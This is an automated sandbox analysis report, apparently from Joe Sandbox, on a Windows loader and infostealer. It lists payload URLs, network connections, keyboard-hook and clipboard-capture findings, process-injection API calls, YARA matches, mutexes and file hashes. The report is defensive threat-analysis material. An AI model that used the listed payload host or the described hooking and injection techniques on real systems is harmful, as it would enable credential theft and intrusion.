Source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 00000008.00000000.2153332087.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 00000016.00000002.2321565604.0000000002E22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000017.00000000.2301803862.0000000000416000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.pmail.com
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000626000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DCD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysx
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DE3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfsse
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssl
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_0640C970 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0640D7F0,00000000,00000000 24_2_0640C970
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window created: window name: CLIPBRDWNDCLASS

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
.NET source code contains very large strings
Source: server_BTC.exe.8.dr, opqcmgIPmeabY.cs Long String: Length: 17605
Source: TrojanAIbot.exe.10.dr, opqcmgIPmeabY.cs Long String: Length: 17605
Contains functionality to call native functions
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78670 NtUnmapViewOfSection, 0_2_02E78670
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78400 NtReadVirtualMemory, 0_2_02E78400
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E77A2C NtAllocateVirtualMemory, 0_2_02E77A2C
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02E7DC8C
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02E7DC04
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02E78D70
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02E7DD70
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E77D78 NtWriteVirtualMemory, 0_2_02E77D78
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E77A2A NtAllocateVirtualMemory, 0_2_02E77A2A
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02E7DBB0
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02E78D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB8670 NtUnmapViewOfSection, 22_2_02DB8670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB8400 NtReadVirtualMemory, 22_2_02DB8400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB7A2C NtAllocateVirtualMemory, 22_2_02DB7A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB7D78 NtWriteVirtualMemory, 22_2_02DB7D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread, 22_2_02DB8D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DBDD70 NtOpenFile,NtReadFile,NtClose, 22_2_02DBDD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB86F7 NtUnmapViewOfSection, 22_2_02DB86F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB7AC9 NtAllocateVirtualMemory, 22_2_02DB7AC9
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB7A2A NtAllocateVirtualMemory, 22_2_02DB7A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread, 22_2_02DB8D6E
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 0_2_02E7F7C8
Detected potential crypto function
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E620C4 0_2_02E620C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009E41C8 9_2_009E41C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009E4A98 9_2_009E4A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009EEA80 9_2_009EEA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009EAA43 9_2_009EAA43
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009E3E80 9_2_009E3E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009EDF00 9_2_009EDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009EDF00 9_2_009EDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_062756B8 9_2_062756B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_062766E8 9_2_062766E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_0627C2A0 9_2_0627C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_0627B32A 9_2_0627B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06273178 9_2_06273178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06277E78 9_2_06277E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06277798 9_2_06277798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_0627E4C0 9_2_0627E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06272350 9_2_06272350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06270040 9_2_06270040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06275DDF 9_2_06275DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06270025 9_2_06270025
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 10_2_028B85B7 10_2_028B85B7
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 10_2_028B85C8 10_2_028B85C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0306B490 11_2_0306B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0306B470 11_2_0306B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_08973E98 11_2_08973E98
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065BDAAC 15_2_065BDAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B1B94 15_2_065B1B94
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065BE608 15_2_065BE608
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B25B8 15_2_065B25B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B25A8 15_2_065B25A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B4172 15_2_065B4172
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B1D20 15_2_065B1D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_06633360 15_2_06633360
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DA20C4 22_2_02DA20C4
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DAC977 22_2_02DAC977
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C941C8 24_2_00C941C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C9A988 24_2_00C9A988
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C9EA80 24_2_00C9EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C94A98 24_2_00C94A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C93E80 24_2_00C93E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C9DE38 24_2_00C9DE38
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C9DE38 24_2_00C9DE38
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_064047CC 24_2_064047CC
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06401B48 24_2_06401B48
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_064067F1 24_2_064067F1
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06401F00 24_2_06401F00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06405A41 24_2_06405A41
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06405AC0 24_2_06405AC0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06405B08 24_2_06405B08
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06417E78 24_2_06417E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_064166E8 24_2_064166E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_064156B8 24_2_064156B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_0641C2A0 24_2_0641C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06412360 24_2_06412360
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_0641B338 24_2_0641B338
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06417798 24_2_06417798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_0641E4C0 24_2_0641E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06415DF0 24_2_06415DF0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06410040 24_2_06410040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06410025 24_2_06410025
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\Wisrysxl.PIF 054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Found potential string decryption / allocating functions
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02DA46D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02DA4860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02DB894C appears 50 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E64500 appears 33 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E64860 appears 949 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E789D0 appears 45 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E7894C appears 56 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E644DC appears 74 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E646D4 appears 244 times
Sample file is different than original file name gathered from version info
Source: 2jbMIxCFsK.exe Binary or memory string: OriginalFilename vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D99000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2143795019.0000000022293000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2143795019.0000000022264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002275000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Uses 32bit PE files
Source: 2jbMIxCFsK.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Yara signature match
Source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: armsvc.exe.8.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.8.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winEXE@49/26@4/3
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E67FD4 GetDiskFreeSpaceA, 0_2_02E67FD4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E76DC8 CoCreateInstance, 0_2_02E76DC8
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe File created: C:\Users\Public\Libraries\PNO Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7270c52c6967b89b-inf
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7270c52c6967b89b73779169-b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\neworigin.exe Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
